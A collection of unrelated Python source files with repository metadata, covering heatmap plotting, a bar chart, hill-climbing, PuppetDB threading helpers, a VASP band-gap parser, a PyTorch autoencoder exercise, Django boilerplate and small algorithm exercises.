def generate_kde_heatmap(centers,
i=0,
image_name="",
grid_size=1,
radius=30):
"""
WARNING Slow
KDE Quartic kernel plot
"""
def kde_quartic(d, h):
"""
function to calculate intensity with quartic kernel
:param d: distance
:param h: radius
:return:
"""
dn = d / h
P = (15 / 16) * (1 - dn ** 2) ** 2
return P
start = time.time()
x = centers[:, 0]
y = centers[:, 1]
h = radius
# x,y min and max
x_min, x_max, y_min, y_max = min(x), max(x), min(y), max(y)
# grid constructions
x_grid = np.arange(x_min - h, x_max + h, grid_size)
y_grid = np.arange(y_min - h, y_max + h, grid_size)
x_mesh, y_mesh = np.meshgrid(x_grid, y_grid)
# grid center point
xc = x_mesh + (grid_size / 2)
yc = y_mesh + (grid_size / 2)
# processing
intensity_list = []
for j in range(len(xc)):
intensity_row = []
for k in range(len(xc[0])):
kde_value_list = []
for i in range(len(x)):
# calculating distance
d = math.sqrt((xc[j][k] - x[i]) ** 2 + (yc[j][k] - y[i]) ** 2)
if d <= h:
p = kde_quartic(d, h)
else:
p = 0
kde_value_list.append(p)
# summing all intensity values
p_total = sum(kde_value_list)
intensity_row.append(p_total)
intensity_list.append(intensity_row)
# heatmap output
intensity = np.array(intensity_list)
plt.pcolormesh(x_mesh, y_mesh, intensity)
plt.plot(x, y, 'ro') # plot center points
plt.xticks([])
plt.yticks([])
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_{i}.{image_name.split(".")[1]}')
plt.clf()
print("Heatmap generation time", round((time.time() - start) * 1000, 3), 'ms')
def generate_cv2_heatmap(centers,
center_labels,
i=0,
image_name=None,
n_components=3,
covariance_type='diag'):
start = time.time()
# fit a Gaussian Mixture Model with two components
clf = GaussianMixture(n_components=n_components, covariance_type=covariance_type)
X_train = np.vstack((centers, centers * 1.01)) # duplicate all centers
clf.fit(X_train, np.hstack((center_labels, center_labels)))
# display predicted scores by the model as a contour plot
x = np.linspace(-100, 100, 200)
y = np.linspace(-100, 100, 200)
X, Y = np.meshgrid(x, y)
XX = np.array([X.ravel(), Y.ravel()]).T
Z = -clf.score_samples(XX)
heatmap = Z.reshape(X.shape)
heatmap2 = cv2.resize(-heatmap, (800, 600))
heatmapshow = None
heatmapshow = cv2.normalize(heatmap2, heatmapshow, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)
heatmapshow = cv2.applyColorMap(heatmapshow, cv2.COLORMAP_JET)
if image_name is not None:
fname = f'demo/result/{image_name.split(".")[0]}_cv2_{i}.{image_name.split(".")[1]}'
cv2.imwrite(fname, heatmapshow)
print(f"GMM Contour & OpenCV Heat map time {round((time.time() - start) * 1000, 3)}ms")
return heatmapshow
def generate_sk_gaussian_mixture(centers,
center_labels,
i=0,
image_name="",
n_components=3,
covariance_type='diag',
draw_contour=False):
"""
Sklearn Gaussian Mixture Model
"""
start = time.time()
# fit a Gaussian Mixture Model with two components
clf = GaussianMixture(n_components=n_components, covariance_type=covariance_type)
X_train = np.vstack((centers, centers * 1.01)) # duplicate all centers
clf.fit(X_train, np.hstack((center_labels, center_labels)))
# display predicted scores by the model as a contour plot
x = np.linspace(-100, 100, 200)
y = np.linspace(-100, 100, 200)
X, Y = np.meshgrid(x, y)
XX = np.array([X.ravel(), Y.ravel()]).T
Z = -clf.score_samples(XX)
Z = Z.reshape(X.shape)
if draw_contour:
plt.contour(X, Y, Z, levels=20, cmap=cm.jet)
plt.scatter(X_train[:, 0], X_train[:, 1], 3)
plt.title('GMM clusters')
plt.axis('tight')
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_gmm_cont{i}.{image_name.split(".")[1]}')
plt.clf()
heatmap = Z
plt.scatter(X_train[:, 0], X_train[:, 1], 3)
plt.imshow(-heatmap, interpolation='bilinear', origin='lower',
cmap=cm.jet)
plt.gca().invert_yaxis()
plt.savefig(f'demo/result/{image_name.split(".")[0]}_gmm_hmap{i}.{image_name.split(".")[1]}')
plt.clf()
print(f"GMM Contour & Heat map time {round((time.time() - start) * 1000, 3)}ms")
|
[
"samhunsadamant@gmail.com"
] |
samhunsadamant@gmail.com
|
469ad0de3326f303fbd9aad31a63fd4780fd8403
|
aa72194e9dabc23ef83f5890225a60e1e9961aeb
|
/pyplot/pyplot_bar_chart_horizon.py
|
37de376601bf0cd9103fd20ebb8d682ec04ce840
|
[] |
no_license
|
chrisna2/pandas_with_stock
|
bdec5da414ac65e045ce7cd350e01b593ffec996
|
4ac660288f780cf5d16b25cdc28ca046e194311e
|
refs/heads/master
| 2022-10-09T06:59:41.597016
| 2022-09-13T12:28:11
| 2022-09-13T12:28:11
| 214,951,212
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import font_manager, rc
font_name = font_manager.FontProperties(fname="C:/Windows/Fonts/malgun.ttf").get_name()
rc('font', family=font_name)
industry = ['통신업','의료정밀','운수업창고','의약품','음식료품','전기가스업','서비스업','전기전자','종이목재','증권']
fluctuations = [1.83, 1.30, 1.30, 1.26, 1.06, 0.93, 0.77, 0.68, 0.65, 0.61]
fig = plt.figure(figsize=(12, 8))
ax = fig.add_subplot(111)
'''
세로 그래프에서 가로 그래프로 전환
'''
ypos = np.arange(10)
rects = plt.barh(ypos, fluctuations, align='center', height=0.5)
plt.yticks(ypos, industry)
for i, rect in enumerate(rects):
ax.text(0.95 * rect.get_width(),
rect.get_y() + rect.get_height() / 2.0,
str(fluctuations[i])+'%',
ha='right',
va='center')
plt.xlabel('등락률')
plt.show()
|
[
"chrisna2@hanmail,net"
] |
chrisna2@hanmail,net
|
6fed9cbc088abb0e15108a8775e4974e2d3d3d9c
|
805665ba37ad17c9da639beb84f85f5a6431e097
|
/SinglePoint/PHC.py
|
5167a76adce2d06b3257d9ac26dae6c729b53e37
|
[
"MIT"
] |
permissive
|
Juanc0/OptimizationTests
|
16246dcc829465e32669c7efe98bf5ba99da2e81
|
59f57e02a23c3fa580c9aea3206ea37b98ed64c0
|
refs/heads/master
| 2020-07-24T23:45:21.794123
| 2019-10-16T10:17:23
| 2019-10-16T10:17:23
| 208,087,558
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
from multiprocessing.pool import ThreadPool
from HC import HC
class PHC:
def __init__(self, x, f, stop, step, threads):
self.f = f
self.HC = HC(x, f, stop, step)
self.pool = ThreadPool(processes = threads)
self.threads = threads
def exe(self):
#exes = [self.pool.apply_async(self.HC.exe(), args=()) for i in range(self.threads)]
exes = [self.HC.exe() for i in range(self.threads)]
#minimizers = [ret.get() for ret in exes]
#return PHC.minimizer(minimizers, self.f)
return PHC.minimizer(exes, self.f)
@staticmethod
def minimizer(minimizers, f):
minimizer = minimizers[0]
minimum = f(minimizer)
for mini in minimizers:
new = f(mini)
if new < minimum:
minimizer = mini
return minimizer
|
[
"juanpos97@gmail.com"
] |
juanpos97@gmail.com
|
cf706a98c06a9e54a44714fe96e6e31e62e087e0
|
729d826978bd7c0d808629f1be5c2ebffe856799
|
/pano/puppetdb/pdbutils.py
|
95f2f88307304d01461cd84967eb28f41bc0b95b
|
[
"Apache-2.0"
] |
permissive
|
jwennerberg/panopuppet
|
e892e34f1820dc1f8281d066e686f6d3905bffd2
|
567e7f3001b4f3819a3f8af0a8251bb0a1ceb233
|
refs/heads/master
| 2021-01-14T13:44:18.894736
| 2015-03-30T12:56:39
| 2015-03-30T12:56:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,632
|
py
|
import datetime
import queue
from threading import Thread
from pano.puppetdb import puppetdb
import pano.methods.dictfuncs
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def tzname(self, dt):
return str('UTC')
def dst(self, dt):
return datetime.timedelta(0)
def __repr__(self):
return str('<UTC>')
def __str__(self):
return str('UTC')
def __unicode__(self):
return 'UTC'
def json_to_datetime(date):
"""Tranforms a JSON datetime string into a timezone aware datetime
object with a UTC tzinfo object.
:param date: The datetime representation.
:type date: :obj:`string`
:returns: A timezone aware datetime object.
:rtype: :class:`datetime.datetime`
"""
return datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ').replace(
tzinfo=UTC())
def is_unreported(node_report_timestamp, unreported=2):
try:
if node_report_timestamp is None:
return True
last_report = json_to_datetime(node_report_timestamp)
last_report = last_report.replace(tzinfo=None)
now = datetime.datetime.utcnow()
unreported_border = now - datetime.timedelta(hours=unreported)
if last_report < unreported_border:
return True
except AttributeError:
return True
return False
def run_puppetdb_jobs(jobs, threads=6):
if type(threads) != int:
threads = 6
if len(jobs) < threads:
threads = len(jobs)
jobs_q = queue.Queue()
out_q = queue.Queue()
def db_threaded_requests(i, q):
while True:
t_job = q.get()
t_path = t_job['path']
t_params = t_job.get('params', {})
t_verify = t_job.get('verify', False)
t_api_v = t_job.get('api', 'v3')
results = puppetdb.api_get(
path=t_path,
params=puppetdb.mk_puppetdb_query(t_params),
api_version=t_api_v,
verify=t_verify,
)
out_q.put({t_job['id']: results})
q.task_done()
for i in range(threads):
worker = Thread(target=db_threaded_requests, args=(i, jobs_q))
worker.setDaemon(True)
worker.start()
for job in jobs:
jobs_q.put(jobs[job])
jobs_q.join()
job_results = {}
while True:
try:
msg = (out_q.get_nowait())
job_results = dict(
list(job_results.items()) + list(msg.items()))
except queue.Empty:
break
return job_results
|
[
"takeshi.p.larsson@gmail.com"
] |
takeshi.p.larsson@gmail.com
|
db8236cb38994639e473477f46c0cffb49bef4fd
|
e18198c0df3155fdc5c7962300da52a2ce613d8b
|
/api_for_selenium/manage.py
|
a26adfae243186c4535cc57498da28abf39b59ce
|
[
"MIT"
] |
permissive
|
sayantansingha01/interview1
|
058fe8705e0284bac34ded3230b8194b237874b9
|
8ecbbcf7d293830fe4e46a98aedef9bc6d1d1272
|
refs/heads/main
| 2023-06-27T11:58:43.535970
| 2021-07-29T07:34:03
| 2021-07-29T07:34:03
| 390,621,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_for_selenium.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"sayantansinghasara@gmail.com"
] |
sayantansinghasara@gmail.com
|
c4b9a7add45bcfdc33148593901df9adc58eb559
|
71ed291b47017982a38524b4ff8fe94aa947cc55
|
/String/LC257. Binary Tree Path.py
|
8024e307b462af60e2471526defd6973b8ca39f2
|
[] |
no_license
|
pingting420/LeetCode_Algorithms
|
da83b77e8f37bd4f461b0a7e59c804871b6151e5
|
f8786864796027cf4a7a8b0ad76e0b516cd99b54
|
refs/heads/main
| 2023-07-17T22:46:08.803128
| 2021-09-02T22:06:38
| 2021-09-02T22:06:38
| 375,401,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
class Solution:
def binaryTreePaths(self, root):
"""
:type root: TreeNode
:rtype: List[str]
"""
def construct_paths(root, path):
if root:
path += str(root.val)
if not root.left and not root.right: # cur node is not leaf node
paths.append(path) # add the path to the ans
else:
path += '->' # if cur node is not leaf, continue to traversal
construct_paths(root.left, path)
construct_paths(root.right, path)
paths = []
construct_paths(root, '')
return paths
|
[
"bellapingting@gmial.com"
] |
bellapingting@gmial.com
|
6eac2e6e75bf180aae3072c5f7fed4fbcc52e4b7
|
61a40a90fd5d25446e932a24958641c75d17c4f4
|
/perform_pca.py
|
fb7fbf2e569f80226e7331c7baa48134ce48b425
|
[
"BSD-3-Clause"
] |
permissive
|
janiksielemann/shape-based-TF-binding-prediction
|
8fff7dcbf3d888d39661f78e0438e6b367792df8
|
32f86b958b6619fa45f2184bb7cd40f3a195a851
|
refs/heads/master
| 2023-04-18T16:56:27.522055
| 2021-10-10T13:17:44
| 2021-10-10T13:17:44
| 295,798,062
| 2
| 2
| null | 2021-10-10T12:57:03
| 2020-09-15T17:13:53
|
Python
|
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd
from sklearn.decomposition import PCA
#set border length
border_length = 4
# generate list of shapes
all_shapes = ['Stagger', 'Rise', 'Opening', 'Buckle', 'MGW', 'Tilt', 'HelT', 'Roll', 'Shear', 'Slide', 'Stretch', 'ProT', 'Shift']
# generate whole set
shape_fimo = pd.read_csv("shape_fimo_forward.csv")
core_motif_len = len(shape_fimo["matched_sequence"].iloc[0])
header = []
for shape in all_shapes:
for i in range((30 - border_length),(30 + core_motif_len + border_length)):
header.append(shape + "_" + str(i))
X_shapes = shape_fimo[header]
#PCA
pca = PCA(n_components=10)
principal_components = pca.fit_transform(X_shapes.to_numpy())
principal_df = pd.DataFrame(data = principal_components, columns = ['PC1', 'PC2', 'PC3', 'PC4', 'PC5', 'PC6', 'PC7', 'PC8', 'PC9', 'PC10'])
principal_df.to_csv("dimensionally_reduced_features.tsv", sep="\t", index=False)
|
[
"noreply@github.com"
] |
janiksielemann.noreply@github.com
|
90ba9df1955c6619815acec5713452feddccdc4b
|
fd722476f7032c0f50293a56fa68f13a4802c4e6
|
/fm4111/bin/bandgap
|
8dd174d93258a95922044651b062d584e26a7c23
|
[] |
no_license
|
egilsk/fys-mena4111
|
1f3ab44153b95d9047dbc1e69645613c19740d8f
|
85dd40934e864fef1c536b75dbbf754dc2527755
|
refs/heads/master
| 2022-04-08T14:55:43.441603
| 2020-02-12T18:44:46
| 2020-02-12T18:44:46
| 221,038,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,833
|
#!/bin/env python
#
# Find the band gap from a vasp OUTCAR file
# Written by Ole Martin Lovvik, 2018-09-06
# $LastChangedDate$
# $Rev$
#
# Please send bugs to ole.martin.lovvik@sintef.no
'''
Usage: bandgap [options] OUTCAR_FILE[S]
Reports the band gap of one or more VASP calculations.
It is defined as the CBM - VBM, where the
VBM is defined by the Fermi level from VASP.
If the band gap is zero, the overlap between
VBM and CBM is thus shown as a negative number.
Options:
-h, --help Show this help message and exit
-v VM, --valencemax VM Reports the gap (positive) or overlap (negative) between
band number VM and VM+1.
'''
from __future__ import division
from __future__ import print_function
import os, shutil, re, sys, string, math
import getopt
def band_gap(valencemax=None,filename=["OUTCAR"]):
if valencemax==None:
fermisearch = 1
else:
fermisearch = 0
# Initialize:
valencemaxenergy=-100
conductionminenergy=100
# Open input file:
try:
ifile = open( filename, 'r') # r for reading
except IOError:
print("Error: File does not appear to exist. "+filename)
return()
# Find the Fermi energy:
nkpoints, fermienergy = find_fermi(ifile)
# Position in ifile: E-fermi : ...
if fermienergy == None:
print("Error: did not find the Fermi energy. "+filename)
return()
# Find the highest occupied orbital (valencemax) if not already specified:
if valencemax==None:
nk, valenceocc, conductionocc,valencemax = find_valencemax(ifile,fermienergy)
else:
nk = 0
valenceocc = 0
conductionocc = 0
# Move to correct position in OUTCAR:
ifile.seek(0)
while 1:
line = ifile.readline()
if re.search('E-fermi :', line):
break
# Search for the highest energy of the valence band (valencemaxenergy)
# and the lowest energy of the conduction band (conductionminenergy):
searchstring='^ +' + str(int(valencemax)) + ' '
while nk < nkpoints + 1:
line = ifile.readline()
if re.search(searchstring, line):
no,valenceenergy,occ = list(map(float, line.split()))
nk = nk + 1
valenceocc = valenceocc + occ
if valenceenergy>valencemaxenergy:
valencemaxenergy=valenceenergy
line = ifile.readline()
no,conductionenergy,occ = list(map(float, line.split()))
conductionocc = conductionocc + occ
if conductionenergy<conductionminenergy:
conductionminenergy=conductionenergy
if not line:
break
# print results:
bandgap = conductionminenergy - valencemaxenergy
valenceocc = valenceocc/nk
conductionocc = conductionocc/nk
print("%8.4f %4d %8.4f %8.4f %7.2f %7.2f %s" % (bandgap, valencemax, valencemaxenergy, conductionminenergy, valenceocc, conductionocc, filename))
# Find Fermi energy:
def find_fermi(ifile):
# Find Fermi energy:
while 1:
line = ifile.readline()
if re.search('irreducible', line):
a,points,b = line.split(None,2)
nkpoints = int(points)
if re.search('1st', line):
a,points,b = line.split(None,2)
nkpoints = int(points)
elif re.search('electrostatic', line): # Go to self-consistent band structure
break
elif not line:
return(None,None)
while 1:
line = ifile.readline()
if re.search('E-fermi', line):
a,b,energy,c = line.split(None,3)
fermienergy=float(energy)
return(nkpoints, fermienergy)
elif not line:
return(None,None)
# Find valence band maximum:
def find_valencemax(ifile,fermienergy):
nklist=[]
nkn=0
while 1:
line = ifile.readline()
if re.search('k-point ', line):
nklist.append(line.split()[-3:])
nkn+=1
#print(nkn)
if re.search('band No.', line):
break
while 1:
line = ifile.readline()
no,valenceenergy,occ = list(map(float, line.split()))
if valenceenergy>fermienergy:
valencemax = no-1
conductionminenergy = valenceenergy
conductionocc = occ
nk = 1
break
valencemaxenergy = valenceenergy
valenceocc = occ
if not line:
print("Error: did not find the highest valence band")
return(None,None,None,None)
return(nk,valenceocc,conductionocc,valencemax)
def main():
global valencemax
global files
# Default values:
files=["OUTCAR"]
valencemax=None
shopts = 'hv'
longopts = ['help', 'valencemax']
try:
opts, args = getopt.getopt(sys.argv[1:], shopts, longopts)
except getopt.GetoptError as err:
# print help information and exit:
print('{0}: {1}'.format(sys.argv[0], str(err)))
print(__doc__)
sys.exit(2)
for o, a in opts:
if o in ('-h', '--help'):
# print help information and exit:
print(__doc__)
sys.exit()
elif o in ('-v', '--valencemax'):
valencemax = int(args[0])
del args[0]
else:
assert False, 'unhandled option'
print('Error: option is not known')
sys.exit(2)
if len(args) > 0:
files = args
print("Gap\tBand#\tVBM\tCBM\tVBM-occ\tCBM-occ\tFile")
for filename in files:
band_gap(valencemax=valencemax,filename=filename)
if __name__ == "__main__":
col_width = {'col1' : 18, 'col2' : 13, 'col3' : 17}
rows_proj = ['Gap', 'Band#', 'VBM', 'CBM', 'VBM-occ', 'CBM-occ']
main()
|
[
"egilsk@stallo-2.local"
] |
egilsk@stallo-2.local
|
|
4270b715b9c38ea114badce39c4031d8aaa8894b
|
210baab405f7224e9ef24b59598e8ce719f570c0
|
/models/M64/M64.py
|
4fbf41dc2799a58a01918416675100083608cae2
|
[] |
no_license
|
DexiongYung/domain-adaptation
|
aed642689cd7228fbaf681217b3cda3011e2a2fc
|
291d46117b58a5f5c0f4f8e8fa95c0a49ade21f3
|
refs/heads/master
| 2023-07-06T16:29:23.866602
| 2021-08-15T09:19:59
| 2021-08-15T09:19:59
| 381,237,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 304
|
py
|
import torch.nn as nn
class M64(nn.Module):
def __init__(self, content_latent_size = 32, input_channel = 3, flatten_size = 1024):
super(M64, self).__init__()
self.content_latent_size = content_latent_size
self.input_channel = input_channel
self.flatten = flatten_size
|
[
"YungDexiong@hotmail.com"
] |
YungDexiong@hotmail.com
|
5183d376a6b88b1b2cb642129762e86e74285b11
|
55769e0abdf2df24a8e67baa28e5742b9667ce5e
|
/autoencoder_task/task.py
|
f632d7a204d3d58ae58d91ad734aac06291096e4
|
[] |
no_license
|
jgamper/DeepBayesApplication
|
3a310b2e610ad8ae8fd927767519b13dbb34f2e4
|
643f40818b58fa8c5990152b30aff8bc1e9918ea
|
refs/heads/master
| 2020-03-07T17:30:20.364599
| 2018-04-22T20:20:46
| 2018-04-22T20:20:46
| 127,613,062
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,832
|
py
|
import os
import torch
import argparse
import numpy as np
import torch.utils.data
from torch import nn, optim
from torch.autograd import Variable
from torchvision import datasets, transforms
from torchvision.utils import save_image
class AutoEncoder(nn.Module):
def __init__(self, inp_size, hid_size):
super(AutoEncoder, self).__init__()
"""
Here you should define layers of your autoencoder
Please note, if a layer has trainable parameters, it should be nn.Linear.
## !! CONVOLUTIONAL LAYERS CAN NOT BE HERE !! ##
However, you can use any noise inducing layers, e.g. Dropout.
Your network must not have more than six layers with trainable parameters.
:param inp_size: integer, dimension of the input object
:param hid_size: integer, dimension of the hidden representation
"""
self.inp_size = inp_size
self.hid_size = hid_size
################################################################
# Hacky way to introduce hyper-parameters, since we can't modify
# the functions or class inputs and have to fill only the blanks
# I used some of these for research question purposes
self.num_layers = 2 # Numer of layers
self.l1_loss = True # or L2 alternative
self.l1_weights = True # or L2 regularisation alternative
self.lam = 0.0001 # Parameter regularisation strength
self.loss_f = nn.L1Loss() if self.l1_loss == True else nn.MSELoss()
self.weight_f = nn.L1Loss(size_average=False) if self.l1_weights == True else nn.MSELoss(size_average=False)
# Let the encoder and decoder number of hidden units be adjusted
# according to local hyper-parameter - number of layers
encoder_l = np.linspace(self.inp_size, self.hid_size, self.num_layers+1).astype(int).tolist()
decoder_l = encoder_l[::-1]
# Build a list of tuples (in_size, out_size) for nn.Linear
self.encoder_l = [(encoder_l[i], encoder_l[i+1]) for i in range(len(encoder_l[:-1]))]
self.decoder_l = [(decoder_l[i], decoder_l[i+1]) for i in range(len(decoder_l[:-1]))]
# Given above build encoder and decoder networks
self.encoder = self.return_mlp(self.num_layers, self.encoder_l)
self.decoder = self.return_mlp(self.num_layers, self.decoder_l)
@staticmethod
def return_mlp(num_layers, num_hidden):
"""
Applicant defined function to return an mlp
:param num_layers: int, number of layers
:param num_hidden: list, with elements being a number of hidden units
"""
# Creates layers in an order Linear, Tanh, Linear, Tanh,.. and so on.. using list comprehension
layers = [[nn.Linear(num_hidden[i][0], num_hidden[i][1]), nn.BatchNorm1d(num_hidden[i][1]),
nn.ReLU()] for i in range(num_layers-1)]
layers = [layer for sublist in layers for layer in sublist]
# Append last layer whihc will be just Linear in this case
layers.append(nn.Linear(num_hidden[num_layers-1][0], num_hidden[num_layers-1][1]))
layers.append(nn.Sigmoid())
# Convert into model
model = nn.Sequential(*layers)
return model
def param_reg(self):
"""
Applies regularisation to model parameters
"""
reg = 0
# Loop over models and their parameters and compute regularisation constraints
for model in [self.encoder, self.decoder]:
for param in model.parameters():
target = Variable(torch.zeros(param.size()))
reg += self.weight_f(param, target)
# Multiply with regularisation strenght and return
return reg * self.lam
def encode(self, x):
"""
Encodes objects to hidden representations (E: R^inp_size -> R^hid_size)
:param x: inputs, Variable of shape (batch_size, inp_size)
:return: hidden represenation of the objects, Variable of shape (batch_size, hid_size)
"""
return self.encoder(x)
def decode(self, h):
"""
Decodes objects from hidden representations (D: R^hid_size -> R^inp_size)
:param h: hidden represenatations, Variable of shape (batch_size, hid_size)
:return: reconstructed objects, Variable of shape (batch_size, inp_size)
"""
return self.decoder(h)
def forward(self, x):
"""
Encodes inputs to hidden representations and decodes back.
x: inputs, Variable of shape (batch_size, inp_size)
return: reconstructed objects, Variable of shape (batch_size, inp_size)
"""
return self.decode(self.encode(x))
def loss_function(self, recon_x, x):
"""
Calculates the loss function.
:params recon_x: reconstructed object, Variable of shape (batch_size, inp_size)
:params x: original object, Variable of shape (batch_size, inp_size)
:return: loss
"""
loss = self.loss_f(recon_x, x)
reg_loss = self.param_reg()
return loss + reg_loss
def train(model, optimizer, train_loader, test_loader):
for epoch in range(10):
model.train()
train_loss, test_loss = 0, 0
for data, _ in train_loader:
data = Variable(data).view(-1, 784)
x_rec = model(data)
loss = model.loss_function(x_rec, data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
train_loss += loss.data[0]
print('=> Epoch: %s Average loss: %.3f' % (epoch, train_loss / len(train_loader.dataset)))
model.eval()
for data, _ in test_loader:
data = Variable(data, volatile=True).view(-1, 784)
x_rec = model(data)
test_loss += model.loss_function(x_rec, data).data[0]
test_loss /= len(test_loader.dataset)
print('=> Test set loss: %.3f' % test_loss)
n = min(data.size(0), 8)
comparison = torch.cat([data.view(-1, 1, 28, 28)[:n], x_rec.view(-1, 1, 28, 28)[:n]])
if not os.path.exists('./pics'): os.makedirs('./pics')
save_image(comparison.data.cpu(), 'pics/reconstruction_' + str(epoch) + '.png', nrow=n)
return model
def test_work():
print('Start test')
get_loader = lambda train: torch.utils.data.DataLoader(
datasets.MNIST('./data', train=train, download=True, transform=transforms.ToTensor()),
batch_size=50, shuffle=True)
train_loader, test_loader = get_loader(True), get_loader(False)
try:
model = AutoEncoder(inp_size=784, hid_size=20)
optimizer = optim.Adam(model.parameters(), lr=1e-3)
except Exception:
assert False, 'Error during model creation'
return
try:
model = train(model, optimizer, train_loader, test_loader)
except Exception:
assert False, 'Error during training'
return
test_x = Variable(torch.randn(1, 784))
rec_x, hid_x = model(test_x), model.encode(test_x)
submodules = dict(model.named_children())
layers_with_params = np.unique(['.'.join(n.split('.')[:-1]) for n, _ in model.named_parameters()])
assert (hid_x.dim() == 2) and (hid_x.size(1) == 20), 'Hidden representation size must be equal to 20'
assert (rec_x.dim() == 2) and (rec_x.size(1) == 784), 'Reconstruction size must be equal to 784'
assert len(layers_with_params) <= 6, 'The model must have no more than 6 layers '
assert np.all(np.concatenate([list(p.shape) for p in model.parameters()]) <= 800), 'All hidden sizes must be less than 800'
assert np.all([isinstance(submodules[name], nn.Linear) for name in layers_with_params]), 'All layers with parameters must be nn.Linear'
print('Success!🎉')
if __name__ == '__main__':
test_work()
|
[
"jevgenij.gamper5@gmail.com"
] |
jevgenij.gamper5@gmail.com
|
9793347779f69c826570acc355bb6cdf1294661c
|
ed0635218d236383fcf76a7c8ad341e49398c310
|
/django_film/films/migrations/0002_auto_20201024_1814.py
|
9dc5b742374ef37bbb1920ad4951bb4c5e931366
|
[] |
no_license
|
PixelGore/DjangoMovie
|
d470bea3c6859c05816e34daba027d35c84ac99e
|
8aedb37de959be1bc7d12db11c1efdf80b054525
|
refs/heads/master
| 2023-01-12T14:45:06.488388
| 2020-11-18T19:38:44
| 2020-11-18T19:38:44
| 289,012,907
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
# Generated by Django 3.1 on 2020-10-24 15:14
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('films', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='film',
old_name='buget',
new_name='budget',
),
migrations.AlterField(
model_name='film',
name='world_premiere',
field=models.DateField(default=datetime.date.today),
),
]
|
[
"pixelgore312@gmail.com"
] |
pixelgore312@gmail.com
|
dc0d960ac8949374c88a435763cdfbd88be35774
|
372185cd159c37d436a2f2518d47b641c5ea6fa4
|
/面试题 01.06. 字符串压缩-2.py
|
762b147ca2bbe70cac56a5165cae8e41198f3003
|
[] |
no_license
|
lidongze6/leetcode-
|
12022d1a5ecdb669d57274f1db152882f3053839
|
6135067193dbafc89e46c8588702d367489733bf
|
refs/heads/master
| 2021-07-16T09:07:14.256430
| 2021-04-09T11:54:52
| 2021-04-09T11:54:52
| 245,404,304
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
class Solution:
def compressString(self, S: str) -> str:
S += '-' # S结尾添加了一个-以避免尾部特殊判断
cnt, n, encoded = 1, len(S), ""
for i in range(1, n):
if S[i] == S[i - 1]:
cnt += 1
else:
encoded += S[i - 1] + str(cnt)
cnt = 1
return S[:-1] if len(encoded) >= n - 1 else encoded
S="aabcccccaaa"
print(Solution().compressString(S))
|
[
"lidongze6@163.com"
] |
lidongze6@163.com
|
346c037b556e11558d727e9d60f768c6218ab88b
|
2b86301d5ad3fecaa5a300cabfe6b4dfc82b78ed
|
/venv/Lib/site-packages/cassiopeia/transformers/status.py
|
49c3c8f18ce979ce173b3259f82f4f330884db75
|
[
"MIT"
] |
permissive
|
sserrot/champion_relationships
|
72823bbe73e15973007e032470d7efdf72af3be0
|
91315d6b7f6e7e678d9f8083b4b3e63574e97d2b
|
refs/heads/master
| 2022-12-21T05:15:36.780768
| 2021-12-05T15:19:09
| 2021-12-05T15:19:09
| 71,414,425
| 1
| 2
|
MIT
| 2022-12-18T07:42:59
| 2016-10-20T01:35:56
|
Python
|
UTF-8
|
Python
| false
| false
| 871
|
py
|
from typing import Type, TypeVar
from datapipelines import DataTransformer, PipelineContext
from ..core.status import ShardStatusData, ShardStatus
from ..dto.status import ShardStatusDto
T = TypeVar("T")
F = TypeVar("F")
class StatusTransformer(DataTransformer):
@DataTransformer.dispatch
def transform(self, target_type: Type[T], value: F, context: PipelineContext = None) -> T:
pass
# Dto to Data
@transform.register(ShardStatusDto, ShardStatusData)
def shard_status_dto_to_data(self, value: ShardStatusDto, context: PipelineContext = None) -> ShardStatusData:
return ShardStatusData(**value)
# Data to Core
#@transform.register(ShardStatusData, ShardStatus)
def shard_status_data_to_core(self, value: ShardStatusData, context: PipelineContext = None) -> ShardStatus:
return ShardStatus.from_data(value)
|
[
"sserrot@users.noreply.github.com"
] |
sserrot@users.noreply.github.com
|
38603d24ebc7e0e81b6743d9967c7e4044bfa08a
|
6ffc48e8656320d064c554c663c2e9150fd57582
|
/code_blocks/functions.py
|
6b31609d7831734994eeb8767e411333e3de1ab3
|
[] |
no_license
|
cslisenka/learn-python
|
509aebe2efb07c8024c623ed78dde28966f54ed9
|
24eb94510e8559de1e4ef58d6238d989dbc0e797
|
refs/heads/main
| 2023-03-20T08:13:25.542930
| 2021-03-19T15:41:02
| 2021-03-19T15:41:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,484
|
py
|
# Function example
# first parameter is string, second is integer
def say_hi(name, age):
# All core of the function happens inside space
print("Say hi " + name + " age " + str(age))
# This statement is also inside function
print("Say hi again")
# Function doesn't return value
# Function that returns value
def cube(num):
print("Computing cube of " + str(num))
return num * num * num
# Function with multiple input parameters
def my_sum(num1, num2):
print("Computing sum of " + str(num1) + " and " + str(num2))
return num1 + num2
